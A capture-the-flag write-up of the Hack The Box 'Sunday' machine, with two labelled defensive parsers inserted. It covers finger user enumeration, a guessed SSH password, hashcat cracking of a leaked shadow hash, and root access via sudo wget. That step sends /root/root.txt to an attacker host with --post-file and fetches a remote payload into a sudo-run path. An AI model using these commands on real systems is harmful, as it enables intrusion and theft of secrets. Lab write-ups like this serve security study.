Hackthebox - Sunday

Box Information

Box Type

Information Gathering

Nmap

┌──(root💀lucifiel)-[/home/lucifiel]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-14 12:51 CST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.76
Host is up (0.14s latency).
Not shown: 59990 filtered ports, 5540 closed ports
PORT      STATE SERVICE  VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
|   GenericLines:
|     No one logged on
|   GetRequest:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help:
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest:
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie:
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind  2-4 (RPC #100000)
515/tcp   open  printer?
6787/tcp  open  ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after:  2031-12-06T19:40:00
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
22022/tcp open  ssh      OpenSSH 7.5 (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   142.34 ms 10.10.14.1
2   142.67 ms 10.10.10.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 498.43 seconds

Port 79 shows up as finger?; the trailing ? means Nmap could not confirm the service from the data it returned. Let's search for known vulnerabilities.

Searchsploit

┌──(root💀kali)-[~/Desktop]
└─# searchsploit finger
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                    |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
BSD 4.2 - 'fingerd' Remote Buffer Overflow                                                                                                                                        | bsd/remote/19039.txt
cfingerd 1.4 - Format String (1)                                                                                                                                                  | linux/remote/20748.pl
cfingerd 1.4 - Format String (2)                                                                                                                                                  | linux/remote/20749.c
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (1)                                                                                                                  | unix/local/20962.pl
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (2)                                                                                                                  | unix/local/20963.c
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (3)                                                                                                                  | unix/local/20964.c
Daniel Beckham The Finger Server 0.82 Beta - Pipe                                                                                                                                 | cgi/remote/19745.txt
FingerTec Fingerprint Reader - Remote Access and Remote Enrolment                                                                                                                 | hardware/remote/39227.txt
GNU Ffingerd 1.19 - 'Username' Validity Disclosure                                                                                                                                | unix/remote/20327.txt
Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure                                                                                                    | multiple/remote/39292.pl
Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow                                                                                                                             | freebsd/local/19504.c
Morris Worm - fingerd Stack Buffer Overflow (Metasploit)                                                                                                                          | bsd/remote/45791.rb
OpenVms 8.3 Finger Service - Stack Buffer Overflow                                                                                                                                | multiple/dos/32193.txt
SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation                                                                                                                   | linux/local/22806.sh
Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software                                                                                                         | windows/local/48815.txt
zkfingerd 0.9.1 - 'say()' Format String                                                                                                                                           | linux/remote/22101.c
zkfingerd SysLog 0.9.1 - Format String                                                                                                                                            | linux/remote/22091.c
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Address Relay Fingerprinting (How to Use Often Discarded Bugs)                                                                                                                    | english/13193-address-relay-fing
Automated Web Application Fingerprinting                                                                                                                                          | docs/english/17538-automated-web
Bitter Harvest: Systematically Fingerprinting Low- and Medium-interaction Honeypots at Internet Scale                                                                             | docs/english/45365-bitter-harves
[Portuguese] Web Apps Fingerprinting                                                                                                                                              | portuguese/13683-[portuguese]-we
[Spanish] El fingerprinting dentro de la seguridad web                                                                                                                            | docs/spanish/18421-[spanish]-el-
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

There are quite a few results. After ruling out cfingerd and the other irrelevant entries, only Morris Worm - fingerd Stack Buffer Overflow (Metasploit) is left.

Let's give it a try.

Metasploit

msf6 > search fingerd

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  exploit/bsd/finger/morris_fingerd_bof  1988-11-02       normal  Yes    Morris Worm fingerd Stack Buffer Overflow

Interact with a module by name or index. For example info 0, use 0 or use exploit/bsd/finger/morris_fingerd_bof

msf6 > use 0
[*] Using configured payload bsd/vax/shell_reverse_tcp

Set the module options:

msf6 exploit(bsd/finger/morris_fingerd_bof) > show options 

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.76      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   79               yes       The target port (TCP)

Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.7       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85

Then run it:

msf6 exploit(bsd/finger/morris_fingerd_bof) > exploit 

[-] 10.10.10.76:79 - Exploit failed: bsd/vax/shell_reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.

That failed, so let's see whether there are other modules:

msf6 exploit(bsd/finger/morris_fingerd_bof) > search finger

Matching Modules
================

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   1   auxiliary/scanner/finger/finger_users                            normal  No     Finger Service User Enumerator
   2   auxiliary/server/browser_autopwn                                 normal  No     HTTP Client Automatic Exploiter
   3   exploit/bsd/finger/morris_fingerd_bof           1988-11-02       normal  Yes    Morris Worm fingerd Stack Buffer Overflow
   4   auxiliary/gather/mybb_db_fingerprint            2014-02-13       normal  Yes    MyBB Database Fingerprint
   5   exploit/windows/http/bea_weblogic_post_bof      2008-07-17       great   Yes    Oracle Weblogic Apache Connector POST Request Buffer Overflow
   6   auxiliary/scanner/oracle/isqlplus_login                          normal  No     Oracle iSQL*Plus Login Utility
   7   auxiliary/scanner/oracle/isqlplus_sidbrute                       normal  No     Oracle iSQLPlus SID Check
   8   post/windows/gather/enum_putty_saved_sessions                    normal  No     PuTTY Saved Sessions Enumeration Module
   9   auxiliary/scanner/smb/smb_version                                normal  No     SMB Version Detection
   10  auxiliary/scanner/vmware/esx_fingerprint                         normal  No     VMWare ESX/ESXi Fingerprint Scanner

Interact with a module by name or index. For example info 10, use 10 or use auxiliary/scanner/vmware/esx_fingerprint

There is a username scanner here, auxiliary/scanner/finger/finger_users; let's try it:

msf6 auxiliary(scanner/finger/finger_users) > show options 

Module options (auxiliary/scanner/finger/finger_users):

   Name        Current Setting                                                Required  Description
   ----        ---------------                                                --------  -----------
   RHOSTS      10.10.10.76                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       79                                                             yes       The target port (TCP)
   THREADS     1                                                              yes       The number of concurrent threads (max one per host)
   USERS_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of default UNIX accounts.
msf6 auxiliary(scanner/finger/finger_users) > exploit 

[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: ikeuser
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: netadm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: netcfg
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dhcpserv
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: daemon
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: ftp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: noaccess
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nobody
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nobody4
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: root
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sshd
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sys
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: aiuser
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: openldap
[+] 10.10.10.76:79        - 10.10.10.76:79 Users found: adm, aiuser, bin, daemon, dhcpserv, dladm, ftp, ikeuser, lp, netadm, netcfg, noaccess, nobody, nobody4, openldap, root, sshd, sys
[*] 10.10.10.76:79        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploitation

That did not seem very useful, so I found a script:

https://github.com/pentestmonkey/finger-user-enum.git

Then run it and see:

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S

Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Apr 14 01:51:49 2022 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm>
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            console      <Dec 19 10:30>..
sammy@10.10.10.76: sammy           ???            console      <Dec 19 08:35>..
sunny@10.10.10.76: sunny           ???            console      <Dec 19 09:56>..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Thu Apr 14 02:29:46 2022 #########
15 results.

10177 queries in 2277 seconds (4.5 queries / sec)

Three users stand out here because they all have login records: root, sammy and sunny.
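Read from the defensive side, the finding is that the finger daemon answers for any name and leaks which accounts are real and when they last logged on. The parser below is added here and is not part of the original writeup or of finger-user-enum; it triages output in that tool's format (the sample is constructed from the lines above) and separates accounts with a real login record from system accounts that have never logged in.

```python
import re

# Constructed sample in the format finger-user-enum prints: "<query>@<host>: <reply>"
# per line, with the newlines inside the finger reply rendered as "..".
SAMPLE = (
    "admin@10.10.10.76: Login       Name               TTY         Idle    When    Where"
    "..adm      Admin                              < .  .  .  . >"
    "..dladm    Datalink Admin                     < .  .  .  . >..\n"
    "bin@10.10.10.76: bin             ???                         < .  .  .  . >..\n"
    "dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where"
    "..dee                   ???..dee                   ???..\n"
    "root@10.10.10.76: root     Super-User            console      <Dec 19 10:30>..\n"
    "sammy@10.10.10.76: sammy           ???            console      <Dec 19 08:35>..\n"
    "sunny@10.10.10.76: sunny           ???            console      <Dec 19 09:56>..\n"
    "sys@10.10.10.76: sys             ???                         < .  .  .  . >..\n"
)

# One finger record: login, free text (GECOS name, tty, idle), then the When field in <>.
# Fragments without a <...> field (the header row, "dee ???" = unknown user) are skipped.
RECORD = re.compile(r"^(?P<login>\S+)\s+(?P<rest>.*?)\s*<(?P<when>[^>]*)>$")
NEVER = re.compile(r"^[\s.]*$")            # "< .  .  .  . >": no login ever recorded
TTY = re.compile(r"\b(console|pts/\d+|tty\S*)\b")


def parse_finger_enum(text):
    """Map every login seen in the replies to its tty and last-login time.

    The same account can appear under several queries (e.g. "adm" under the
    "admin" query), so results are keyed by login, not by query.
    """
    accounts = {}
    for line in text.splitlines():
        if ": " not in line:
            continue
        _query, reply = line.split(": ", 1)
        for fragment in reply.split(".."):
            m = RECORD.match(fragment.strip())
            if not m:
                continue
            when = m.group("when").strip()
            tty = TTY.search(m.group("rest"))
            accounts[m.group("login")] = {
                "tty": tty.group(1) if tty else None,
                "last_login": None if NEVER.match(when) else when,
            }
    return accounts


def accounts_with_logins(text):
    """Logins that carry a real last-login timestamp: the interactive users."""
    return sorted(login for login, rec in parse_finger_enum(text).items() if rec["last_login"])


if __name__ == "__main__":
    for login, rec in sorted(parse_finger_enum(SAMPLE).items()):
        print(f"{login:10} tty={rec['tty']!s:8} last_login={rec['last_login']}")
    print("interactive users:", accounts_with_logins(SAMPLE))
```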

Judging from the box's image and name, the account should be sunny and the password is probably sunday:

┌──(root💀lucifiel)-[/home/lucifiel/Desktop]
└─# ssh -p 22022 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
ED25519 key fingerprint is SHA256:t3OPHhtGi4xT7FTt3pgi5hSIsfljwBsZAUOPVy8QyXc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (ED25519) to the list of known hosts.
Password:
Warning: 4 failed authentication attempts since last successful authentication.  The latest at Thu Apr 14 06:59 2022.
Last login: Sun Dec 19 09:56:51 2021 on console
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
sunny@sunday:~$ whoami&&id
sunny
uid=101(sunny) gid=10(staff)

Successfully got in as a user.

sunny@sunday:/home/sammy$ cat user.txt
a3d9498027ca5187ba1793943ee8a598

Got the user flag.

Privilege Escalation

sunny@sunday:/home/sammy$ sudo -l
用户 sunny 可以在 sunday 上运行以下命令:
    (root) NOPASSWD: /root/troll

Checked our privileges with sudo -l: /root/troll can be run as root.

Let's run it and see:

sunny@sunday:/home/sammy$ sudo /root/troll
sudo: /root/troll:找不到命令

Command not found? Then let's look for another way:

sunny@sunday:/backup$ ls
agent22.backup  shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Found a file shadow.backup in the /backup directory, which gives us a hash; let's try cracking it:
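From the defender's side, the problem is a world-readable backup of /etc/shadow. The audit below is added here and is not part of the writeup; it parses Solaris shadow entries in the format shown above (the sample is constructed from those lines) and reports which accounts actually expose a crackable hash, which algorithm it uses (the -m 7400 used later follows from the $5$ prefix), and how old each password is.

```python
from datetime import date, timedelta

# Constructed sample in the same format as the /backup/shadow.backup found on the box:
# Solaris shadow(4) fields name:password:lastchg:min:max:warn:inactive:expire:flag,
# where lastchg counts days since 1970-01-01.
SAMPLE = """\
mysql:NP:::::::
openldap:*LK*:::::::
svctag:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) prefix -> (algorithm, hashcat mode) for the $id$salt$digest schemes.
ALGORITHMS = {
    "$1$": ("md5crypt", 500),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
}
EPOCH = date(1970, 1, 1)


def classify_password_field(field):
    """Return (state, algorithm, hashcat_mode, salt) for one shadow password field."""
    if field.startswith(("*", "!")):
        return "locked", None, None, None          # *LK* (Solaris), !, !! or * (Linux)
    if field == "NP":
        return "no-password", None, None, None     # Solaris: no password, password login impossible
    if field == "":
        return "empty", None, None, None           # anyone can log in without a password
    for prefix, (name, mode) in ALGORITHMS.items():
        if field.startswith(prefix):
            parts = field.split("$")               # ["", id, ("rounds=N",) salt, digest]
            salt = parts[3] if parts[2].startswith("rounds=") else parts[2]
            return "hashed", name, mode, salt
    return "hashed", "unknown", None, None         # e.g. 13-char DES crypt or a vendor scheme


def audit_shadow(text):
    """Parse shadow-format lines into one record per account."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue                               # not a shadow entry
        state, algorithm, mode, salt = classify_password_field(fields[1])
        lastchg = fields[2]
        rows.append({
            "user": fields[0],
            "state": state,
            "algorithm": algorithm,
            "hashcat_mode": mode,
            "salt": salt,
            "last_changed": (EPOCH + timedelta(days=int(lastchg))).isoformat() if lastchg.isdigit() else None,
        })
    return rows


def exposed_hashes(text):
    """Accounts whose field carries a real hash: what a leaked copy lets an attacker crack."""
    return sorted(r["user"] for r in audit_shadow(text) if r["state"] == "hashed")


if __name__ == "__main__":
    for r in audit_shadow(SAMPLE):
        print(f"{r['user']:10} {r['state']:12} {r['algorithm'] or '-':12} last_changed={r['last_changed']}")
    print("exposed hashes:", exposed_hashes(SAMPLE))
```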

# single quotes are required: unquoted, the shell expands $5 and $Ebkn8jlK as variables and writes a mangled hash
echo '$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB' > hash

Then start cracking:

┌──(root💀kali)-[~/Desktop]
└─# hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 2878/2942 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Thu Apr 14 21:29:17 2022 (2 mins, 59 secs)
Time.Estimated...: Thu Apr 14 21:32:16 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1145 H/s (13.57ms) @ Accel:128 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 203776/14344385 (1.42%)
Rejected.........: 0/203776 (0.00%)
Restore.Point....: 203264/14344385 (1.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: dadof3 -> chs2009

Started: Thu Apr 14 21:28:48 2022
Stopped: Thu Apr 14 21:32:17 2022

Got the password:

username = sammy
password = cooldude!

Log in with it:

sunny@sunday:~$ su sammy
Password:
sammy@sunday:~$ whoami&&id
sammy
uid=100(sammy) gid=10(staff)
sammy@sunday:~$ sudo -l
用户 sammy 可以在 sunday 上运行以下命令:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

Checked privileges with sudo -l: wget can be run as root, which makes this easy; we have a plan.

Then use wget's --post-file to send ourselves the file we want (the second command is the alternative route: fetch a script into /root/troll, which sunny can run as root):

sudo wget --post-file=/root/root.txt 10.10.14.2
# -O (capital) saves the download to that path; lowercase -o would only write wget's log file there
sudo wget http://10.10.14.7/payload.sh -O /root/troll

Then switch back to the sunny user and run it with sudo /root/troll:

sudo /root/troll

For the --post-file route, start an nc listener first and then run that command:

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.76] 59151
POST / HTTP/1.1
User-Agent: Wget/1.19.5 (solaris2.11)
Accept: */*
Accept-Encoding: identity
Host: 10.10.14.2
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

fb40fab61d99d37536daeec0d97af9b8

Got the root flag.